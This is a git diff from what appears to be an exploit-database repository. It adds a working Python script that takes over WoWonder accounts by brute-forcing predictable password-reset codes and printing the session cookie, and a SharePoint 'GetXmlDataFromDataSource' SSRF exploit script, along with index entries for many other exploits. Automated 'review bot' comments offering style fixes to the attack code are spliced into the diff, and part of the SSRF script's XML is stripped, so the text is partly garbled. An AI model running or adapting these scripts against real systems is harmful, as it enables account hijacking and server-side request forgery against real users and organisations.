+# Researchers : Security For Everyone Team - https://securityforeveryone.com
+# Vendor Homepage: https://www.wowonder.com/
+# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
+# Version: < 3.1
+# Tested on: Linux/Windows
+
+'''
+DESCRIPTION
+
+In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day.
+The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999.
+if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application.
+
+ABOUT SECURITY FOR EVERYONE TEAM
+
+We are a team that has been working on cyber security in the industry for a long time.
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
+'''
+
+import requests
+import email.utils as eut
+import calendar, time;
+import hashlib, re;
+
+url = "http://wowonderlab:80/wowonder/" #change this with your target
+myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}
+recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"} #change this email with your registered wowonder email address
+req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata)
+b = eut.parsedate(req.headers["Date"])
+respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S'))
+
+for token in range(111,1000):
+ str2hash = "{0}{1}".format(token,respepoch)
+ email_code = hashlib.md5(str2hash.encode()).hexdigest()
+
+ req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code))
+ if len(re.findall("New password",req_reset.text)) == 1:
+ print(email_code)
+ resetdata = {"password": "10711071", "id": "1_"+email_code}
+ reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata)
+ print(reqtoken.headers['Set-Cookie'])
+ break
\ No newline at end of file
diff --git a/exploits/windows/webapps/49982.py b/exploits/windows/webapps/49982.py
new file mode 100755
index 000000000..ecf973d5e
--- /dev/null
+++ b/exploits/windows/webapps/49982.py
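Review bot: The `Date` header is parsed into a struct-time tuple by `eut.parsedate`, rendered back into a string with `str.format`, parsed a second time with `time.strptime` and only then handed to `calendar.timegm`; `calendar.timegm` accepts the tuple `parsedate` returns directly, so `respepoch = calendar.timegm(eut.parsedate(req.headers["Date"]))` computes the same value without the round trip. The import lines `import calendar, time;` and `import hashlib, re;` combine modules on one line and carry trailing semicolons, which PEP 8 discourages. `req.headers["Date"]` and `reqtoken.headers['Set-Cookie']` both raise KeyError when the header is absent rather than reporting the condition; this should at least be noted in a comment since the script otherwise has no error handling.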
@@ -0,0 +1,132 @@
+# Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)
+# Date: 09 Jun 2021
+# Exploit Author: Alex Birnberg
+# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462
+# Version: 16.0.10372.20060
+# Tested on: Windows Server 2019
+# CVE : CVE-2021-31950
+
+#!/usr/bin/env python3
+
+import html
+import random
+import string
+import xml.sax.saxutils
+import textwrap
+import requests
+import argparse
+import xml.etree.ElementTree as ET
+from requests_ntlm2 import HttpNtlmAuth
+from urllib.parse import urlencode, urlparse
+
+class Exploit:
+ def __init__(self, args):
+ o = urlparse(args.url)
+ self.url = args.url
+ self.service = o.path
+ self.username = args.username
+ self.password = args.password
+ self.target = args.target
+ self.headers = args.header
+ self.method = args.request
+ self.data = args.data
+ self.content_type = args.content_type
+ self.s = requests.Session()
+ self.s.auth = HttpNtlmAuth(self.username, self.password)
+ self.s.headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
+ }
+ self.s.proxies = {
+ 'http': 'http://127.0.0.1:8080'
+ }
+
+ def trigger(self):
+ headers = ''
+ if self.headers:
+ for header in self.headers:
+ header = list(map(lambda x: x.strip(), header.split(':')))
+ if len(header) != 2:
+ continue
+ headers += '{}'.format(header[0], header[1])
+ method = ''
+ bypass_local = ''
+ if self.method and self.method.upper() == 'POST':
+ method = 'HTTP Post'
+ else:
+ method = 'HTTP Get'
+ bypass_local = '{0}'.format(''.join(random.choice(string.ascii_letters) for i in range(16)))
+ content_type = ''
+ if self.content_type and len(self.content_type):
+ content_type = '{}'.format(self.content_type)
+ data = ''
+ if self.data and len(self.data):
+ data = '{}'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8'))
+ query_xml = textwrap.dedent('''\
+
+
+ XMLURLDataAdapter
+
+
+
+
+
+
+
+
+
+
+ {}
+ {}
+ {}
+ {}
+
+
+
+
+
+ '''.format(self.target, method, bypass_local, headers, data, content_type))
+ query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', ''))
+ data = textwrap.dedent('''\
+
+
+
+
+ {}
+
+
+ '''.format(query_xml))
+ r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data)
+ root = ET.fromstring(r.content)
+ try:
+ namespaces = {
+ 'soap': 'http://schemas.xmlsoap.org/soap/envelope/'
+ }
+ value = list(root.find('soap:Body', namespaces).iter())[2]
+ if value.tag == 'faultcode':
+ print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text)
+ else:
+ print(value.text)
+ except:
+ print(r.content)
+ pass
+
+ def soap(self, service, action, data):
+ headers = {
+ 'SOAPAction': '"{}"'.format(action),
+ 'Host': 'localhost',
+ 'Content-Type': 'text/xml; charset=utf-8',
+ }
+ return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data)
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument('--url', help='Base URL', required=True, metavar='')
+ parser.add_argument('--username', help='Username of team site owner', required=True, metavar='')
+ parser.add_argument('--password', help='Password of team site owner', required=True, metavar='')
+ parser.add_argument('--target', help='Target URL to work with', required=True, metavar='')
+ parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='')
+ parser.add_argument('-X', '--request', help='Specify request command to use', metavar='')
+ parser.add_argument('-d', '--data', help='HTTP POST data', metavar='')
+ parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='')
+ exploit = Exploit(parser.parse_args())
+ exploit.trigger()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d5152a42c..9660103c9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44084,6 +44084,7 @@ id,file,description,date,author,type,platform,port
 49886,exploits/php/webapps/49886.txt,"COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)",2021-05-19,"Rohit Burke",webapps,php,
 49887,exploits/php/webapps/49887.txt,"COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)",2021-05-19,"Rohit Burke",webapps,php,
 49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",2021-05-21,nu11secur1ty,webapps,multiple,
+49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",2021-05-21,"Mansoor R",webapps,php,
 49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",2021-05-21,mekhalleh,webapps,windows,
 49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)",2021-05-24,"Emir Polat",webapps,multiple,
 49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",2021-05-24,"Marek Toth",webapps,java,
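Review bot: Style: the bare `except:` around the SOAP response parsing in `trigger` catches everything, including `KeyboardInterrupt`, and the `pass` after `print(r.content)` is unreachable filler; `except (AttributeError, IndexError):` names the two failures that path can actually produce (`root.find(...)` returning `None`, and the `[2]`/`[3]` index on the iterator). `urlencode` is imported but never used, and `self.service` is assigned in `__init__` but never read. The `#!/usr/bin/env python3` line sits on line 9, after the header comments, so it does not act as a shebang. The XML template inside `trigger` and the `metavar` values appear with their angle-bracketed content stripped in this rendering, so that part of the hunk cannot be reviewed here.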
@@ -44134,3 +44135,13 @@ id,file,description,date,author,type,platform,port
 49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php,
 49974,exploits/php/webapps/49974.txt,"Student Result Management System 1.0 - 'class' SQL Injection",2021-06-10,"Riadh Benlamine",webapps,php,
 49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,
+49980,exploits/multiple/webapps/49980.txt,"Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)",2021-06-11,"Abdulazeez Alaseeri",webapps,multiple,
+49981,exploits/multiple/webapps/49981.txt,"Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)",2021-06-11,"Mohammad Hossein Kaviyany",webapps,multiple,
+49982,exploits/windows/webapps/49982.py,"Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)",2021-06-11,"Alex Birnberg",webapps,windows,
+49983,exploits/php/webapps/49983.py,"OpenEMR 5.0.0 - Remote Code Execution (Authenticated)",2021-06-11,"Ron Jost",webapps,php,
+49984,exploits/php/webapps/49984.html,"WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF",2021-06-11,0xB9,webapps,php,
+49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",2021-06-11,TonyShavez,webapps,multiple,
+49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,
+49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,
+49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)",2021-06-11,"Avinash R",webapps,php,
+49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,